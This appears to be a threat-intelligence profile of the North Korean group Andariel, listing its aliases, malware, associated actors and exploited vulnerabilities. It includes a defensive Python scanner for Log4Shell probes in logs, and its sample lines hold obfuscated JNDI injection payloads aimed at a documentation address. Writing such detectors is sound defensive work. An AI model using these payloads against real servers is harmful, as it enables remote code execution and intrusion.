Alias Description | Votes |
---|---|
Onyx Sleet is a possible alias for Andariel. Onyx Sleet, also known as Andariel, Silent Chollima, and Stonefly, is a North Korean state-sponsored cyber group under the RGB 3rd Bureau. This threat actor utilizes an array of malware to gather intelligence for North Korea, primarily conducting cyberespionage, but also engaging in ransomware activ | 6 |
Reconnaissance General Bureau is a possible alias for Andariel. The Reconnaissance General Bureau (RGB) is a North Korean intelligence agency known for its clandestine operations abroad. Its cyber activities, believed to be coordinated by the secretive organization, have been linked to various threat actors since at least 2014. Notable entities include the Beagl | 6 |
Lazarus Group is a possible alias for Andariel. The Lazarus Group, a notorious threat actor attributed to North Korea, is renowned for its malicious activities aimed at furthering the country's objectives. This group has been implicated in several high-profile cyber-attacks, including the Operation DreamJob campaign, which among other targets compromised an aerospace company in Spain. The exploitati | 5 |
RGB is a possible alias for Andariel. RGB is a notorious threat actor, primarily associated with North Korea's Reconnaissance General Bureau (RGB), a military intelligence agency. This organization falls under the General Staff Bureau of the DPRK Korean People's Army and has been linked to numerous cyber-attacks against international en | 5 |
Stonefly is a possible alias for Andariel. Stonefly, also known as Andariel, Silent Chollima, Onyx Sleet, and APT45, is a threat actor group that has been active since at least 2015 and is believed to be linked to the North Korean government. The group has been involved in various attacks, including ransomware campaigns against Healthcare an | 4 |
Plutonium is a possible alias for Andariel. Plutonium, also known as Jumpy Pisces and Andariel, is a notable threat actor historically involved in cyberespionage, financial crime, and ransomware attacks. Recent reports indicate that this group has been breaching the IT systems of Sellafield, a site that holds the world's largest stockpile of | 3 |
Bluenoroff is a possible alias for Andariel. BlueNoroff, a threat actor group linked to North Korea, has been identified as the malicious entity behind several high-profile cyber-attacks. Since its parent group Lazarus first made headlines with the 2014 attack on Sony Pictures, BlueNoroff and Lazarus have been involved in numerous notorious securi | 3 |
Silent Chollima is a possible alias for Andariel. Silent Chollima, also known as Stonefly or APT45, is a threat actor linked to the 3rd Bureau of North Korea's Reconnaissance General Bureau (RGB), the country's foreign intelligence agency. The group has been active since at least 2015, when it began shifting its objectives. Silent Chol | 3 |
Reconnaissance General Bureau (RGB) is a possible alias for Andariel. The Reconnaissance General Bureau (RGB) of the Korean People's Army is a significant threat actor in global cybersecurity, housing various hacking groups under its control. These groups include well-known entities such as "Lazarus Group," "Bluenoroff," and "Andariel," identified by Executive Order 1 | 3 |
ZINC is a possible alias for Andariel. Zinc, also known as Diamond Sleet, is a North Korea-based threat actor group that has been active since 2009. This group is notorious for its cyber-attacks aimed at collecting political, military, and economic intelligence on North Korea's foreign adversaries, and executing currency generation campa | 2 |
Jumpy Pisces is a possible alias for Andariel. Jumpy Pisces, a North Korean state-sponsored malware group, has been identified as a key player in an unprecedented collaboration with an underground ransomware network. This marks a significant development in the cybersecurity landscape, as it's the first recorded instance of such cooperation betwe | 2 |
APT38 is a possible alias for Andariel. APT38, a threat actor suspected to be backed by the North Korean regime, has been responsible for some of the largest cyber heists observed to date. The group has conducted operations in over 16 organizations across at least 11 countries, primarily targeting financial institutions worldwide. Despite | 2 |
Alias Description | Association Type | Votes |
---|---|---|
The Dtrack Malware is associated with Andariel. DTrack is a malicious software (malware) known for its data theft capabilities. It was first associated with North Korean threat groups and has been used in numerous cyber attacks globally. The malware infiltrates systems through suspicious downloads, emails, or websites, and once inside, it collect | Unspecified | 3 |
The Collectionrat Malware is associated with Andariel. CollectionRAT is a malicious software (malware) first identified in a Cisco Talos report in 2023, with samples dating as far back as 2021. This Windows-based Remote Access Trojan (RAT) is believed to be connected to the Jupiter/EarlyRAT malware family, which has previously been linked to a Lazarus s | Unspecified | 2 |
The Earlyrat Malware is associated with Andariel. EarlyRat is a previously undocumented malware family discovered by Kaspersky researchers in June 2023. The North Korea-linked Advanced Persistent Threat (APT) group Andariel used EarlyRat in 2022 attacks exploiting the Log4j Log4Shell vulnerability. The malware was first noticed in one of the Log4j cases, | Unspecified | 2 |
The Ninerat Malware is associated with Andariel. NineRAT is a malicious software, or malware, that was first built in May 2022 and first observed in use in March 2023 during the Operation Blacksmith campaign against a South American agricultural organization. It is one of two Remote Access Trojans (RATs) utilized by Lazarus, a notorious Advanced Persistent Threat | Unspecified | 2 |
Alias Description | Association Type | Votes |
---|---|---|
The Kimsuky Threat Actor is associated with Andariel. Kimsuky is a threat actor group linked to North Korea, known for its malicious cyber activities with a particular focus on espionage. The group has been observed employing a variety of sophisticated tactics and techniques, including the use of malware such as TOGREASE, GREASE, and RandomQuery, which | Unspecified | 5 |
The temp.hermit Threat Actor is associated with Andariel. Temp.Hermit, also known as Selective Pisces or Diamond Sleet, is a cyber threat actor linked to North Korea. This group has been active since 2013 and targets governments, defense, telecommunications, and financial services sectors with cyberespionage operations. Temp.Hermit's activities often overl | Unspecified | 2 |
Alias Description | Association Type | Votes |
---|---|---|
The Log4Shell Vulnerability is associated with Andariel. Log4Shell is a critical software vulnerability (CVE-2021-44228, with the follow-up fixes tracked as CVE-2021-45046 and CVE-2021-45105) in the Log4j Java-based logging utility. It was exploited by a wide range of threat actors, from LockBit affiliates and GOLD MELODY (UNC961) to state-sponsored Advanced Persistent Threat (APT) groups, to gain unauthorized | Unspecified | 4 |
The CVE-2023-42793 Vulnerability is associated with Andariel. CVE-2023-42793 is a critical security vulnerability identified in JetBrains TeamCity build management and continuous integration server. This flaw, characterized by an authentication bypass, was exploited by multiple threat actors throughout 2023 and into 2024. The first notable exploitation occurre | Unspecified | 4 |
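The Log4Shell entry above records only that the bug was exploited; what a defender wants is a way to spot exploitation attempts in their own logs, including the obfuscated forms attackers use to slip past a naive search for the literal string `${jndi:`. The following Python is an added example written for this page, not code from the original page or from any vendor or group named on it. The access-log lines are constructed, the 203.0.113.10 addresses are documentation addresses, and the lookup emulation is an assumption about attacker tradecraft: it handles only the `lower:`, `upper:` and `:-` default-value tricks, not every Log4j 2 lookup.

```python
import re

# Constructed sample access-log lines for this example; they are not from the
# page or from any real incident. The last four carry Log4Shell-style JNDI
# probes in the User-Agent field, three of them hidden behind nested lookups.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.7 - - "GET /api HTTP/1.1" 200 "${${lower:j}ndi:${lower:r}mi://203.0.113.10:1099/x}"',
    '10.0.0.8 - - "GET /api HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.10/z}"',
    '10.0.0.9 - - "GET /api HTTP/1.1" 200 "${${env:NaN:-j}ndi${env:NaN:-:}ldap://203.0.113.10/q}"',
]

# An innermost ${...} lookup: a body that contains no nested "$", "{" or "}".
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# After normalisation, a JNDI lookup with its scheme (ldap, rmi, dns, ...) and target.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:\s*(?://)?([^}]*)\}", re.IGNORECASE
)


def _resolve_lookup(match):
    """Emulate the few Log4j 2 lookups attackers use to hide the word 'jndi'.

    Only lower:, upper: and the ':-' default-value syntax are emulated (an
    assumption about common obfuscation). Other lookups are left untouched,
    so this is a detection heuristic, not a full Log4j lookup evaluator.
    """
    body = match.group(1)
    lowered = body.lower()
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${anything:-X} evaluates to X when the lookup itself cannot be resolved
        return body.split(":-", 1)[1]
    return match.group(0)  # keep e.g. ${jndi:ldap://...} exactly as it is


def normalize_lookups(text, max_rounds=32):
    """Collapse nested obfuscation lookups from the inside out until stable."""
    for _ in range(max_rounds):
        expanded = INNER_LOOKUP.sub(_resolve_lookup, text)
        if expanded == text:
            break
        text = expanded
    return text


def find_jndi_probe(line):
    """Return (scheme, target) for a Log4Shell-style probe in the line, else None."""
    match = JNDI_LOOKUP.search(normalize_lookups(line))
    if match is None:
        return None
    return match.group(1).lower(), match.group(2)


def scan_log_lines(lines):
    """Return one hit per log line that carries a JNDI probe."""
    hits = []
    for number, line in enumerate(lines, start=1):
        probe = find_jndi_probe(line)
        if probe is not None:
            hits.append({"line": number, "scheme": probe[0], "target": probe[1]})
    return hits


if __name__ == "__main__":
    for hit in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: jndi {hit['scheme']} -> {hit['target']}")
```

Run it as-is and it reports lines 2 to 5 with their schemes and callback targets; the first, benign line is not flagged. The point of normalising before matching is that a detection keyed on the literal `${jndi:` misses three of the four constructed probes, whereas resolving the inner lookups first makes them all collapse to the same `${jndi:<scheme>://...}` shape. The target field is what you would pivot on next, since the callback host is attacker infrastructure.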
Source | CreatedAt |
---|---|
DARKReading | a month ago |
DARKReading | 2 months ago |
Unit42 | 2 months ago |
DARKReading | 2 months ago |
Unit42 | 3 months ago |
InfoSecurity-magazine | 4 months ago |
Securityaffairs | 5 months ago |
DARKReading | 5 months ago |
DARKReading | 5 months ago |
Flashpoint | 5 months ago |
CISA | 5 months ago |
CISA | 5 months ago |
DARKReading | 7 months ago |
Securityaffairs | 7 months ago |
Securelist | 7 months ago |
Checkpoint | 8 months ago |
DARKReading | 8 months ago |
InfoSecurity-magazine | 8 months ago |
Securityaffairs | 8 months ago |
CERT-EU | 10 months ago |